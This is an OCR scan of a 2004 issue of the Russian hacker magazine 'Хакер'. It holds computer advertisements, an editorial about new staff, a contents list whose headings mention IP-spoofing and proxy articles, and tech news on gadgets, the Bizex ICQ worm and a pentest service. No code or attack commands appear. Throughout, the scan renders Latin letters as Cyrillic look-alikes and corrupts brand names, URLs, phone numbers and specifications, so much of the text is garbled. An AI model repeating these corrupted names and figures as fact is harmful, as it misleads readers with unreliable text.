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Вы хотите, чтобы компьютер 
обучал Вашего ребенка дома, 
помогая успевать ему в школе? 



Компьютер \Х/іепег Рго на базе процессора ІпіеІ® Репііит® 4 с поддержкой технологии НТ 
имеет массу возможностей для вовлечения в учебный процесс в свободное время. 

И он останется современным, даже когда ученик превратится в аспиранта. 



Товар сертифицирован 






\аЛВІ0Ѵ 

Процессор ІпіеІ® Репііит® 4 
с поддержкой технологии НТ с частотой 3,2 ГГц 
Материнская плата ОідаЬуІе ІРЕ1000 
Набор микросхем ІпіеІ® 865РЕ 
Оперативная память 51 2 Мбайт 00К БОНАМ РС3200 
Видеокарта АН Касіеоп 9200 1 28 Мбайт 
Звуковая плата встроенная, КеаІІек А1.С655 
Сетевая плата встроенная, ІпіеІ® РРО/ІОООСТ 
Винчестер БегіаІ-АТА 1 20 Гбайт 
Привод 0Ѵ0-С0РѴѴ 




Благодаря современным мультимедийным средствам, \Ѵіепег Рго наглядно представляет информацию, дополняя ее динамичным аудио- и 
визуальным материалом, что сильно улучшает запоминание. Технология НТ позволит компьютеру решать массу сложных задач даже в 
завтрашнем дне. Уже сейчас он может выполнять множество приложений одновременно, например, работать с электронньм 
микроскопом, редактировать изображение и выводить его на печать. И все это без каких-либо задержек. 



СПРАШИВАЙТЕ В СЕТЯХ: 
«М. Видео» (095) 777 7775 
«МИР» (095) 780 0000 
«Эльдорадо» (095) 500 0000 



МАГАЗИНЫ «АЭРТОН» 

В МОСКВЕ: 

* Смоленский б-р, 4, 
ст. м. «Смоленская», 
тел.: 246-82-86, 246-45-46. 

* Ул. Ст. Басманная, 25, стр.1, 
ст. м. «Бауманская», 

тел.: 261-34-01. 



Ул. Б. Андроньевская, 23, 
ст. м. «Марксистская», 
тел.: 232-33-24, 270-04-67. 
Представительство в 
г. Санкт-Петербург, 
ул. Марата, 82, 
тел.: (812) 312-20-43. 



«Имидж. Ру» 

Ул. Новослободская, 16, 
ст. м. «Менделеевская», 
тел.: 737-37-27. 



«Виртуальный Киоск»: 
тел.: (095) 234-37-77, 
тел.: (812) 332-00-77. 
Бесплатная доставка и 
установка. Оформление 
кредита по телефону. 



Интернет-магазин ѵѵѵѵѵѵ.ѵѵіепег.ги. Оплата при получении. Доставка в 150 городов России. Компания В&К имеет свои представительства и сервис-центры в 62 городах РФ 
и других стран СНГ. За дополнительной информацией обращаться по тел.: (095) 234-96-78, ѵѵеЬ: ЬКр://ѵѵѵѵѵѵ.г-апб-к.сот. 

ІпіеІ, логотип ІпіеІ Іпзісіе и Репііит являются зарегистрированными товарными знаками ІпіеІ Согрогаііоп или ее дочерних компаний в США и других странах. 

Все зарегистрированные товарные знаки являются собственностью их владельцев. 



К 

гсгк 





Второй раз ты держишь 
потолстевший номер Хаке- 
ра. Но на этом наш про- 
цесс утолщения не окон- 
чился - теперь и команда 
стала больше размером. К 
нам в команду влились 
еще 3 человека. Помимо 
тіпсІѵѵОгк'а, который рулит 
Сценой, пришли 

Ог.КІоипіг, АпсІгизРоск и 
Мікііоз. Саня Лозовский (он 
же Ог.КІоипіі) теперь заве- 
дует рубрикой Кодинг. 
Скажу честно, он кодер со 
свихнувшейся головой, так 
что теперь и Кодинг дол- 
жен стать соответствую- 
щим. Т.е. будет мясо, 
жесткач. В общем, тебя 
ждет много классного ко- 
дерского материала. 
Должно вставить. 

Апсігизітоск взялся за 
Юниксоид. Естественно, 
человек он нездоровый, и 
рубрика у него такая же. А 
Никите Кислицину а-ля 
N№{03 достался Взлом. Чу- 
вак уже давно живет с вос- 
паленным мозгом, бредит 
всякими идеями. Сам по- 
нимаешь, что это не может 
не повлиять позитивно на 
наш журнал. 

Такие вот радостные изме- 
нения. В итоге у нас собра- 
лась прекрасная команда, 
которая будет выливать 
свою рабочую струю каж- 
дый месяц прямо в жур- 
нал. А я займусь направле- 
нием этой струи в нужно 
русло, чтобы ты совсем 
офигевал от нашего жур- 
нала. Надеюсь, понравит- 
ся. Приятного чтения... 



СиТТег 

сиііег@геаІ. хакер, ги 
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50/Почувствуй байты! 
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ЭПИДЕМИЯ мѵооом: 
МЫ ТЕБЯ ВЫЛЕЧИМ 




Боремся с различными 
интернет-глистами в Сети. 



ПРЕВРПТИ ПОКППКУ 

в машину убийство 




Как объединить мозги 
нескольких компьютеров для 
решения общей задачи. 






Учимся посылать на 
удаленный хост кучу пакетов 
елевым ІР отправителя. 
Вливайся! 




РПБОТП С ПОСРЕДНИКОМ!!! 



Продолжаем тему 
использования прокси. 
Выбираем правильный софт, 
упрощающий переключение 
между прокси-серверами. 



98/Девчачий опрос 

1 00/ИРЗР - аэрокосмический центр 

мира 

1 03/Угопок тети Джины 
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редакция напоиинпЕт, что вся информация, которою мы предостовпяем, 
рассчитана прежде всего на то, чтобы указать различным компаниям 
и организациям на их ошибки в системой безоплсности. 
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Опеке Целых (пеѵѵзііеаі.хакер.ги) і 



I Никита Киспицин (пікі(ощгеаі.хакер.ги) 






Докучаев Дмитрий ака РогЬ ІІогЬігеаІ.хакер.ги) 




НІТЕСН 



а мериканская компания МдМптаге Агтог (ииѵѵ.підМтагеагтог.сот) начала про- 
дажи полноразмерной копии скафандра суперсолдата из фантастического 
шутера Наіо. Бронекостюм в точности повторяет игровую модель. Он выполнен 
из особо прочной пластмассы, стекловолокна и алюминия. Шлем оснащен не- 
оновыми светильниками. Общий вес амуниции - более 10 килограммов. При 
желании костюм можно приобрести по частям, самостоятельно собрать и пок- 
расить. Стоимость скафандра составляет около 3500 долларов. ■ 




ЦИФРП ОТ СП8І0 




0 выходе новой 4-мегапиксельной ка- 
меры Сазіо 0Ѵ-В41В, идущей на 
смену ОѴ-Н40, сообщило европейское 
представительство компании Сазіо. Но- 
винка оснащена бесценной для уличных 
фотографов функцией Оігей-Оп, которая 
позволяет включить камеру и перейти в 
рабочий режим менее чем за одну секун- 
ду - согласись, это очень удобно, когда 
нужно быстро поймать редкий кадр :). 
Собственно, камера так и позициониру- 
ется - по сравнению со старшим братом 
уменьшено и время срабатывания затво- 
ра до 0,01 с. 

Ниже приведены основные характеристи- 
ки новинки: 

А Сенсорная матрица: 1/1,8" ССР, 4,13 млн. аффективны* 
пикселей 

а Поддерживаемые форматы файлов: ЛЕС (Ей. Ѵег. 2.2), 
ЙСЕ, йРОГ-совместимый; АѴІ (Моііоп ЛЕЕ) 

А Носители информации: встроенная флеш-память объе- 
мом 9,7 Мб + картонка формата СР/МиКІМеШа Сагб 
А Фокусное расстояние обьектива: 8-24 мм 
(39-117 мм в 35-мм эквиваленте), апертура - Е/2,8-4,9 
а'іі оптический зум, 4* цифровой 
а Минимальная дистанция фокусировки: 

60 см в обычном и 10 см в макрорежиме 
а Экспонометр: МиНІ-райегп, сепіег-яеідітіеб, эроі; ручная 
настройка от -2ЕѴ до +2ЕѴ (с шагом 1/3 ЕѴ) 

А Светочувствительность: 13064, 130125, 130250, 130500 
-а Таймер: 10, 2,10+2 с 

а Дистанция действия встроенной вспышки: 0,6-44 м 
.а Оптический видоискатель 
-а ЖК-дисплей: 2,0" ТЕТ 354*240 
А В многоязычном меню поддерживается 10 языков 
А Питание: два элемента ДА 
А Размеры: 88,3*60,4x33,4 мм 
А Вес: 168 г 

По оценкам обозревателей, 0Ѵ-В41 посту- 
пит в продажу по цене около 400 евро. ■ 




К омпания Маізизбііа 
ЕІесігіс ѴѴогкз 
(имеи.со/р) выпустила 
интеллектуальную отве- 
ртку. Умный инструмент 
позволяет записывать и 
воспроизводить макро- 
сы. Так, закручивание 
мебельного винта начи- 
нается с медленного вра- 
щения, отвертка посте- 
пенно прибавляет оборо- 
тов, а затем снижает ско- 
рость и останавливается. 
По словам разработчи- 
ков, макросы мастеров- 
профессионалов помогут 
новичкам действовать 
более эффективно. Кро- 
ме этого, отвертка имеет 
функцию обучения, наст- 
раиваясь на часто ис- 
пользуемый владельцем 
диапазон скоростей. Сто- 
имость гаджета - около 
650 долларов. ■ 



ПОПОНОЙ МЕНЯ ЗР ДЕНЬГИ 




К омпания РТЗесигіІу, известная как разработчик популярного сканера 
ХЗрйег, предлагает новую услугу. Сотрудники компании пытаются поло- 
мать заказчика, получить там шелл и стащить конфиденциальную информа- 
цию, которая и является доказательством того, что взлом удался. Эта услуга 
была названа репеігаііоп Іезііпд. Естественно, что проверить сервер на дырки - 
удовольствие дорогое. Цена колеблется от $500 до $2000 в зависимости от по- 
пулярности машины. Клиентами займутся сотрудники РТЗесигіІу и ЗесипІуІлЬ. 
Они гарантируют абсолютную конфиденциальность и полноту тестирования. ■ 
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ФОТОПРИНТЕР 

дпя маньяков 



ПЕРСОНППЬНЫЙ БОТ 



НІТЕСН 



К омпания \ЛМе Вох ВоЬоІісз (иѵѵи.ѵѵІіііеЬохгоЬоіісз.сот) анонсировала выпуск В2-Э2 на основе персоналки. 

Сердцем мобильной роботизированной платформы является материнская плата ѴІА Міпі-ІТХ. В корпус ро- 
бота вмонтированы двигатели, видеокамеры и датчики движения, позволяющие преодолевать препятствия на 
пути. Дополнительные модули - от привода СО-ВОМ до эхо-локатара - пользователь может добавлять и сни- 
мать по своему усмотрению. Среди базовых концепт-моделей РС-ВОТ 912 есть непромокаемый охранник НМѴ, 
меломан МРЗ со встроенным эквалайзером и видеоочками, а также военные роботы АВЗЕИАЕ и СОМАІМСНЕ. 
Новинка будет поставляться как в собранном, так и в разобранном виде с окраской в произвольный цвет и не- 
ограниченными возможностями для модинга. Продажи РС-ВОТ 912 начнутся уже летом этого года. ■ 




ЧЕРВЯК ДЛЯ ТЕТИ ОСИ 



ЖЕЛЕЗО 




О выпуске очередного фотопринтера, 
І9900, сообщила компания Сапоп. 
Новинка поддерживает технологию 
СбготаРШЗ и поступит в продажу в нача- 
ле мая этого года, по рекомендованной 
производителем цене около $500. По 
мнению менеджеров компании, основ- 
ным отличием принтера от предыдущих 
моделей являются новые картриджи под 
красные и зеленые чернила (до сих пор 
принтеры оснащались 6 картриджами). 
Ниже приведены основные специфика- 
ции принтера: 

а Скорость печати цветных изображений: 

10x15 - около 38 с, 20x25 - около 50 с 
А Количество сопел: 6144 (768x8 цветов) 
побьем капли: 2 пиколитра 
А Разрешение: ро 4800x2400 брі 
а Поддерживаемые ОС: Мо№ ХР/Ме/2000/98, Мае 05 
(8.6 Іо 9.x), Мае 05X10.2.1 -10.3.x 
а Интерфейсы: О 2.0, И5В 2.0 Ні-Зреей. РігеВіге, Оігесі 
Ргіпі Рогі 

а Буферная память: 80 Кб 
а Уровень шума: 37 рБ 
.и Традиционная поддержка РісІВгібде ■ 



БУТСЫ С ПОДОГРЕВОМ 



НІТЕСН 



И нженер из Хорватии изобрел оригиналь- 
ные ботинки с подогревом. Благодаря 
специальной подошве, во время ходьбы бут- 
сы вырабатывают энергию. Ее достаточно, 
чтобы привестп в действие ноутбук или не 
дать владельцу замерзнуть. Пара мини-ге- 
нераторов питает портативное нагреватель- 
ное устройство. В специальном костюме, к 
которому тянутся тончайшие проводки, теп- 
ло распространяется по всему телу. Внеш- 
не ботинки ничем не примечательны. ■ 




С овсем недавно выполз очередной червячок Віхех. На этот раз передаю- 
щийся через ІСО. Юзер получает сообщение от собеседника, содержащее 
в себе ссылку на сайт (океногИ.сот. После открытия появляется якобы приколь- 
ный РІазІі-мультик, но на самом деле на машину прорывается троян (через но- 
вую багу в ІЕ 6.0). Червь заменяет системные ІСО-библиотеки, деактивирует 
ІСО клиент и... начинает полноценную жизнь. Теперь, когда ты запустишь ась- 
ку, червячок Віхех методично стучится по контакту, рассылая 1136 на приколь- 
ный флеш-ролик. Интересно, что Віхех поражает лишь ІСО, при этом Мігапба 
и &РЮ (и другие клоны аськи) остаются неуязвимыми. Будьте внимательны, 
господа! Не открывайте ссылки, идущие вместе с сообщением, оканчиваю- 
щимся на ТОН!". Именно эта отличительная особенность сразу выдает троян. 
Похоже, что распространять заразу через е-таіі вирусописателям надоело, и 
они решили использовать для этого всеми любимую тетю Асю. ■ 



НО ПОДМОГЕ 



ХОРОШИЕ НОВОСТИ 




О мериканская компания АтЬіепІ Оеѵісез 
(»и».апІііепі(1еѵісе5.солі) представила хай- 
тек ретранслятор новостей. Светящийся шар- 
хамелеон изменяет окраску в зависимости от 
характера мировых событий. К примеру, при 
росте биржевого индекса он хранит зеленое 
спокойствие, а при его падении - мигает и ок- 
рашивается в тревожный красный цвет. Гад- 
жет, передающий тысячи оттенков цвета, наг- 
лядно отражает прогноз погоды, дорожные 
сводки и несет другую полезную информа- 
цию. Новости поступают на шар по каналам 
пейджинговой связи. Ручка, как у радиопри- 
емника, делает возможным переключение 
между несколькими провайдерами информа- 
ции. Гибкий интерфейс позволяет запрограм- 
мировать шар на освещение событий "ло- 
кального масштаба" - задолженности по кре- 
диту, свободному месту на жестком диске и 
неминуемой близости сессии. Стоимость 
стильного ретранслятора плохих и хороших 
новостей составляет 150 долларов. ■ 



война двух гигантов 




В сем известно о вражде компаний ЗСО и ІВМ. На этот раз ІВМ были предъяв- 
лены обвинения в нарушении авторских прав. Суть претензии в нарушении 
коммерческой тайны путем переноса технологии, разработанной для системы Ііпіх 
в операционку Упих с открытым кодом. ЗСО этого показалось мало, и компания ре- 
шилась предъявить тот же самый иск, по крайней мере, одному крупному пользо- 
вателю, юзающему Упнх. Суд по этой неувязке назначен на 1 1 апреля будущего го- 
да. В ответ на иск, ІВМ подала встречное заявление, в котором ЗСО обвиняется в 
нарушении четырех патентов. Когда закончится эта война - неизвестно... ■ 

РОБОТОНЦОВЩИЦО 



НІТЕСН 



И нженер из японского университета Ва- 
седа обучил робота танцу живота. Без- 
головая ВеІІу Оапсег демонстрирует настоя- 
щие чудеса гибкости. Она мастерски виб- 
рирует пластиной из жести, исполняя слож- 
ный элемент танца под названием "Верб- 
люд". Движениями робота управляет 
компьютерная программа, моделирующая 
сеть нервов миноги. В будущем такой под- 
ход может сделать гибкими и натуральными 
движения роботов- гуманоидов. ■ 



взломай и поплатись жизнью 




Г осорганы произвели небольшой подсчет, в результате которого выяс- 
нилось, что их пытались поиметь аж 900 хакеров за год. В заявлении 
сотрудника ФСБ были сведения об иностранных шпионах и контрразведчи- 
ках. Хакеры были поставлены с ними в один ряд. Правда, никто из взлом- 
щиков не был пойман. Но не все так плохо. По словам Вячеслава Ушакова, 
было выявлено 112 взломов, из которых 25 были пресечены законом. Зам- 
директора ФСБ задумывается о введении специального закона, строго ка- 
рающего хакеров. По крайней мере, Ушаков призвал депутатов отменить 
мораторий на смертную казнь. Так что, опасно взламывать органы. ■ 





М айкрософту снова 
не повезло. Сов- 
сем недавно хитрым 
образом были найдены 
многочисленные ошиб- 
ки в библиотеке АБИ. 1 . 
Эту дыру обнаружил 
Марк Маифретт - ра- 
ботник компании еЕуе 
РідіІаІ Зесигііу. Вернее, 
нашел он ее очень дав- 
но (полгода назад), но 
руководство М5 убеди- 
ло компанию временно 
помолчать об этом, что- 
бы успеть написать за- 
ветный патчик. Из-за 
многочисленных багов, 
которые были найдены 
за последние месяцы, 
Биллу Гейтсу придется 
выступить на мартовс- 
кой представительской 
конференции по безо- 
пасности. Она пройдет 
в городе Сан-Францис- 
ко. Говорят, что уязви- 
мость в этой библиоте- 
ке самая серьезная и 
опасная из всех бре- 
шей, которые наблюда- 
лись в форточках. 




0 пополнении модельного ряда ноут- 
буков ТГііпкРасІ сообщили в пресс- 
релизе представители компании ІВМ. 
Представлены абсолютно новая модель 
Х40 и несколько обновленных версий ІВМ 
ТГііпкРасІ Х31. Новинки отличает подде- 
ржка следующих фирменных технологий 
защиты и восстановления утерянных дан- 
ных: Асііѵе Ргоіесііоп Зузіет, 

Пезсие&Весоѵегу, а также Парій Пезіоге. 
Эти программные продукты написаны на 
независимом от платформы языке и на- 
чинают свою работу еще до загрузки опе- 
рационной системы. В ТГііпкРасІ Х40 реа- 
лизована также технология ТЫпкѴапІаде. 
ТГііпкРасІ Х40 работает на базе процессо- 
ра Іпіеі Репііит-М (ядро Сепігіпо) с так- 
товой частотой до 1,7 ГГц. Опционально 
поддерживаются следующие интерфейсы 
беспроводного доступа: ѴѴІ-РІ ІпГеІ 
802.116, ІВМ 1 1 Ь/д, ІВМ 1 1а/Ь/д и 
ВІиеГооГГі. 

Х40 отличается от своих предшественни- 
ков, буков линейки Х31, уменьшенными 
на 20% размерами и весом (Х40 весит 
всего 1 ,3 кг), а также увеличенным вре- 
менем автономной работы - до 7,5 часов. 
Во всех ноутбуках серии Х40 есть модем, 
ІгОа-порт и ЮООВазе-Т ЕіЬегпеі адаптер. 
В ТГііпкРасІ Х40 реализован порт ЭЗБ 2.0 
с усиленным питанием, доступен модуль 
расширения Х4 ШгаВазе Роск, содержа- 
щий отсек ШгаВау ЗІІт для установки оп- 
тического привода или дополнительного 
аккумулятора, и ІІЗВ 2.0-разветвитель. 
Стоимость ТГііпкРасІ Х40 в конфигурации 
с 1 ,3 ГГц процессором составит пример- 
но $1600. ■ 
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Живи ярко! 

Больше времени для любимых дел! 
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К-81у1е® СагЬоп® Аі 520 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 
Процессор: ІпіеІ® Реп(іит®4 
с технологией Нурег-ТМгеасііпд 3.20 ГГц 
Набор микросхем (чипсет): ІпіеІ® 865РЕ 
Частота системной шины: 800 МГц 
Оперативная память: 256МБ (до 2 ГБ) 
БиаІ СГіаппеІ БОК 400 
Жесткий диск: 40 ГБ (до 360 ГБ) 
Привод 0Ѵ0 (СБ-ВѴѴ, СББ) 
Видеокарта с поддержкой ЗБ - графики. 
Звуковая карта, клавиатура, мышь. 
Операционная система: МісгозоіТ® ѴѴіпсІоѵѵз® ХР 



С компьютером К-5іу1е®СагЬоп®АІ 520 на базе процессора 
ІпіеІ® Репііит® с технологией Нурег-ТЬгеас1іп§ 3 20 ГГц 
нет времени для скуки. Не надо ждать пока закончится 
кодирование любимых песен в МРЗ, смотри фильмы, 
играй в игры, вычисления выполняются в фоновом режиме! 

Обращайтесь к нашим партнерам, и они помогут подобрать 
Вам необходимую конфигурацию компьютера, а также 
необходимое периферийное оборудование и программное 
обеспечение для эффективного выполнения Ваших задач 

Іиір://ттотѵ.г-зіуІе-сотриіег8.ги/Ьиу/ 



Партнеры по розничной продаже и системной интеграции: 

Астрахань «ТАН» (8512) 39-42-54 Братск БАЙТ (395-3) 41-11-21 Владивосток ЭР-СТАЙЛ ДВ (4232) 20-54-10 
Калининград БАЛТИК СТАЙЛ (011) 254-11-98 Кемерово КОНКОРД ПРО (3842) 35-78-88 Краснодар ВСС СОМРАИУ 
(8612) 64-04-50 Красноярск ЛАНСЕРВИС (3912) 23-93-42 Москва К-ЗТУЬЕ ТКАБІИС (095) 514-14-14, КОМПАНИЯ К-ЗТУЬЕ 
(095) 514-14-10, УМНЫЕ МАШИНЫ (095) 389-45-55, «ПРОФИТ-М» (095) 748-02-72, ПРАЙМ ТРУП (095) 725-4432/33, 
СИБКОЩ095) 292-50-12 Нижний Новгород ЭР-СТАЙЛ ВОЛГА (8312) 44-35-17 Новосибирск К-ЗТУЬЕ 5ІВЕКІА 
(383-2) 66- 11-67 Пермь ЭР-СТАЙЛ КАМА (3422) 107-445, Петропавловск-Камчатский АМН (4152) 16-87-51 Ростов-на- 
Дону ЭР-СТАЙЛ ДОН (8632) 52-48-13 Санкт-Петербург К-5ТУІЕ 5РВ (812) 329-36-86 Тамбов ГИТОН (0752) 71-97-54 
Тула ПИТЕРСОФТ-НТ (0872) 35-55-00 Уфа «АЛЬБЕЯ-ТЕХПРОЕКТ» (3472) 28-92-12, КОМПАНИЯ «ОНЛАЙН» (3472) 248-228 
Хабаровск ЭР-СТАЙЛ ДВ РЕГИОН (4212) 31-45-30 

Логотип ІпіеІ, ІпіеІ Іпзісіе и Репііит являются зарегистрированными товарными знаками ІпіеІ Согрогаііоп 
или дочерних компаний ІпіеІ Согрогаііоп на территории США и других стран. 



Компьютеры производства В-Зіуіе Сотриіегз 
поставляются с лицензионной операционной 
системой МісгозоІІ® ѴѴІпсІоѵѵз®. 



Оптовые поставки: Компания Я8І 



тел.: (095) 514-1419 



шѵшві.ги 



Техническая поддержка: 

В-Зіуіе Сотриіегз 
тел.: (095) 903-3830 

ига/ш.г-зіуіе-сотриіегз.ги 




К* 8іу1е 

СОМРІІТЕК5 

Сделано в России. 

Сделано на совесть! 







КРИ 2004 



НІТЕСН 




С 20 по 22 февраля в московской гостини- 
це «Космос» прошла вторая междуна- 
родная Конференция Разработчиков компью- 
терных Игр - КРИ 2004. Организатором этой 
конференции был интернет-сервер йеѵЖш, 
собравший более 1300 участников из 120 
компаний-разработчиков со всей России, а 




ДЖОЗ-БЭНД 
В ИИНИ0ТЮРЕ 



С 


НІТЕСН 




і 








К омпании Кепиооб и Вапбаі (мш.Ііѵе- 
Ішф) представили джаз-бэнд в ми- 
ниатюре. В игрушечном квинтете есть 
свой саксофон, гитара, контрабас, рояль 
и даже ударная установка. Каждая из фи- 
гурок музыкантов расположена на ма- 
ленькой колонке, что создает иллюзию 
живого источника звука. Музыканты рит- 
мично двигаются, имитируя игру на музы- 
кальных инструментах. По заказу с пульта 
дистанционного управления джаз-бэнд 
исполняет одну из 25 классических мело- 
дий, записанных на картридже. Аранжи- 
ровкой может выступать рок, блюз или 
джаз. Игрушка наделена функциями бу- 
дильника. Новинку можно купить в интер- 
нете по цене около 100 долларов. ■ 



В 



8,4 триллиона ОБОРОТОВ 




К омпания Зеадаіе недавно выпустила 
долгожданный пресс-релиз, сооб- 
щающий радостную новость о выходе ли- 
нейки 2,5-дюймовых винчестеров Заѵѵіо, 
предназначенных для использования 
исключительно в серверных системах. 
Винчестеры Заѵѵіо разработаны специ- 
ально для круглосуточной безотказной 
работы. Главное отличие устройств - ско- 
рость вращения шпинделя 10 тыс. 
об./мин и большое время наработки на 
отказ (МТВР) - до 1,4 млн. часов. Таким 
образом, среднестатистический винчес- 
тер сделает за свою жизнь более 8,4 
триллионов оборотов! 

Основные характеристики новых НОР: 

л Форм-фактор: 2,5 іпсбк 

а Поддерживаемые интерфейсы: РІЬге ОтаппеІ. Ш(га320 
5С5І, ЗегіаІ Дйасітеб 5С5І (5*5) 
л Исполнение: два магнитных диска 
А Емкости: 36 Гб, 73 Гб 
л Среднее время доступа к данным: 4.1 мс 
а Энергопотребление: менее 9 Вт 
а Уровень шума в ждущем режиме: 26 дБ 
А Динамическая устойчивость: до 60д в рабочем состоя- 
нии, до 275д в нерабочем состоянии 
а Система с гидродинамическим (РИВ) подшипником 
А Габариты: 111x70x15 мм 
л Вес: около 200 граммов ■ 



ХЛЙ-ТЕК унитаз 



НІТЕСН 




К омпании МаІзизМІа и Іпах представили хай-тек унитаз со 
встроенным проигрывателем трЗ. Инновационная мо- 
дель Заііз оснащена серией датчиков для комфортного вре- 
мяпрепровождения на горшке. В режиме ожидания крышка 
унитаза закрыта. Когда визитер подходит ближе, чем на метр, 
унитаз распахивает свои объятья и включает систему арома- 
тизации воздуха. В верхней части сливного бачка расположен 
отсек для карты Зесиге Оідііаі. Музыка звучит из динамиков в 
утробе унитаза. В зависимости от веса человека, Заііз автома- 
тически спускает от 4,5 до 8 литров воды. После этого крыш- 
ка закрывается, и ионизатор освежает воздух. Новинка поя- 
вится в продаже в апреле по цене 2700 долларов. ■ 









также ближнего и дальнего забугорья. На 
КРИ 2004 приехал даже знаменитый Джон 
Ромеро из іб зоПиаге (создатель Оиаке), к 
которому постоянно подваливали толпы фа- 
натов, желающих получить автограф. 

Всего во время конференции прошло 77 се- 
минаров, посвященных проблемам создания 
компьютерных игр и различным тонкостям в 
программировании. Кто-то ходил на эти са- 
мые семинары, а кто-то просто гамался. И 
последних, что вполне разумно, было боль- 
шинство. Представь, огромный кусок гости- 
ницы отдан под конференцию, и все помеще- 
ние буквально напичкано мощными компами. 
И на каждом компе можно было спокойно иг- 
раться в игрушки разных разработчиков. Вот 
и налетели геймеры в поисках своего 
счастья. 

Сама конференция как таковая понравилась. 
Если ты крутишься в игровой/околоигровой ин- 
дустрии, то обязательно сходи в следующем го- 
ду. Здесь можно было свободно обсудить с ум- 
ными людьми кучу сложных вопросов или прос- 
то поиметь нужные контакты. ■ 





СгеаНпд а Ыеѵ/ Ѵізіоп ! 



Ѵісіео Іп/Оиі 



ѵтѵѵ.ріхеіѵіеѵѵ.ги 



2004 Ве$і Регіогтапсе & Сооііпд Оезідп 
аѵѵагсіз {гот Ніе {ор есШогз о{ Ніе ѵѵогісі! 



Зорег Сооііпд Зуігіот ку СіуА* Марчу* 



128 ЫІ 



ОІгесЖ’Э.ОТШ 









И“" 


ІЩ^^Іаштнз ЁНіаркду Рпп 





ѵѵѵѵѵѵ.ргоііпк.сот.іѵѵ 



Неасіяиагіегз 
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новая серия наладонников сие 




П опулярная линейка карманных 
компьютеров СІІе от Зопу ожи- 
дает пополнения: на прошедшей в 
Японии пресс-конференции инже- 
неры Зопу представили две первые 
модели новой серии: КПК Ыдй-епгі 
класса СІІе РЕО-ТН55 и крепкого 
середнячка СІІе РЕО-Ш7. 
Собственно говоря, предваритель- 
ные сведения о спецификациях 
этих устройств уже всплывали на 
лентах новостных агентств - теперь 
они подтверждены окончательно. 
Но одно ясно совершенно точно - с 
появлением этих устройств рынок 
РОА ждет новая волна прогресса. 
Спецификации СІІе РЕО-ТН55: 




а Процессор 5опу НаЛеІй Епдіпе, АШ-архитек- 
іура 

л Корпус из алюминиевого сплава с акриловой 
крышкой 

А КАМ/КОМ: 32 Мб 

а Цветной сенсорный ЖК-дисплей 320х480х65К 
а Поддержка интерфейсов НоІЗупс ЦЗВ. ІгРА, слот 
под карты Мептогу Зііск (поддержка Мептогу Зііск 
Рго), беспроводной интерфейс ІЕЕЕ 802.116 
а Интегрированная цифровая камера с 310 тыс. 
пикселей 

А 35 мм - оптика с фиксированным фокусным 
расстоянием. Е2.8 

л Минимальная дистанция сьемки: 23 см 
А Разрешения снимков: 640x480, 320x480, 

320x240, 160x120: формат: МО. 

Съемка видеороликов не поддерживается 
А Поддерживаемые аудиоформаты: АТПАСЗ, МРЗ, 
ОиіскТіше (МоЬіІе), МРЕ6-1; в режиме диктофона - 
ІМА АЦРСМ 

а Литий-полимерная батарея, емкости которой 
хватит на 7,5 часов работы 
а Интегрированное зарядное устройство 
А Операционная система Раіпг 03 5.2 
А Небольшие (73,3x15,7x121,5 мм) размеры 
при весе в 185 граммов 
А Рекомендованная цена: около 5400 



Модель РЕС-Т337 представляет со- 
бой усовершенствованную версию 
РЕС-Т325 и отличается наличием 
цифровой камеры и расширенными 
мультимедиа-возможностями. 
Спецификации РЕС-ТТШ: 




а Процессор Моіогоіа І.МХЬ 
А 32 Мб ВАМ-намяти, пользователю доступно 23 Мб 
а 16 Мб интегрированной на СРІ) ВОМ-памяти 
а Цветной сенсорный 320х320х65К дисплей 
А Цифровая камера с 310 тыс. пикселей 
А 35-мм оптика с фиксированным фокусным рас- 
стоянием, Е2.8 

а Минимальная дистанция сьемки: 23 см 
А Разрешение снимков: 640x480, 320x480, 
320x240, 160x120: формат: ЦРЕ0. Съемка видеоро- 
ликов не поддерживается 
А Поддерживаемые аудиоформаты: АТВАСЗ, МРЗ. 
ОиіскТіше (МоЫІе), МРЕ6-1; в режиме диктофона - 
ІМА АЦРСМ 

а Воспроизведение видео: МРЗ/ОшскТіте (МоЫІе) 
а Питий-полимерная батарея, обеспечивающая 
до 2.5 часов автономной работы 
а Интегрированный зарядник 
А Операционная система Раіяі 05 5.2 
А Габариты: 75x13,2x113 мм 
А Вес: 145 граммов 
А Ориентировочная цена: <5280 ■ 




ПОКОДНЫЙ кондишн 



НІТЕСН 



И нженеры Национальной 
лаборатории Министер- 
ства энергетики США разра- 
ботали прототип походного 
кондиционера. Двухкилограм- 
мовое устройство не требует 
наличия розетки и неподъем- 
ных аккумуляторов. Новинка 
работает на легком топливе: 
бензине, пропане или дизеле. Тепловой насос из титана размещается в не- 
большом рюкзаке за спиной. Капиллярами он связан с жилетом, в который 
вплетены микроканалы, заполненные дистиллированной водой. Система 
начинает работать при высоких температурах. Когда воздух прогрет до 50 
градусов Цельсия, насос способен прокачивать охлажденную до 10 граду- 
сов воду еще шесть часов. Устройству найдут применение бедуины в жар- 
кой пустыне и астронавты - для охлаждения скафандров. ■ 




4МЕгапиксЕая пая 
начааьного уровня 




Д ве модели цифровых фотоаппаратов 
начального уровня представила ком- 
пания Ещі РИоІо Рііт ІІЗА. Это РіпеРіх АЗЗО 
и РіпеРіх А340, характеристики которых 
отличаются лишь качеством матрицы: 
3,34 млн. эффективных пикселей у РіпеРіх 
АЗЗО против 4,23 млн. пикселей у РіпеРіх 
А340. 

Основные спецификации новинок приве- 
дены ниже: 

А Сенсор: 1/2,7" ПЗС у обеих моделей, 3,2/4 млн. 
аффективных пикселей 
А Разрешения снимков: 2016x1512, 1600x1200, 

1280x960 у обеих моделей и 2272x1704 у А340 
А Формат видеороликов: 320x240910 (рв, продолжитель- 
ность 60 с: 160x120910 (рв - 240 с. 

Запись звука не поддерживается 
А Формат изображений: ЦРЕ0 (ЕХІЕ 2.2), АѴІ (Моііол ЦРЕ0) 
л Трехкратный оптический зум, фокусное расстояние 
объектива 38-114 мм в 35-мм эквиваленте, Е/2,8-4,8 
а Минимальная дистанция фокусировки - 60 см 
в обычном режиме, 10 см в режиме макросьемки 
а Светочувствительность: 150 100 
а Диапазон выдержек: 2-1/2000 с 
^ Апертура: И: Р/2,8-5,6. Т: Р/4,8-9,5 
а Оптический видоискатель 
а ЖК-экран: 1,5”, 60 тыс. пикселей 
^10-секундный таймер 

А Карта памяти хВ-РісІиге Сагб, 16-метровая карточка 
идет в комплекте 

А Разъемы: видеовыход, Ц5Б, разъем для питания 

А Размеры: 104x62x31 мм 

^Аккумулятор: 2300 мА'ч, (ІІ-МН 

(его хватит на 540 кадров у АЗЗО и на 460 у А340) 

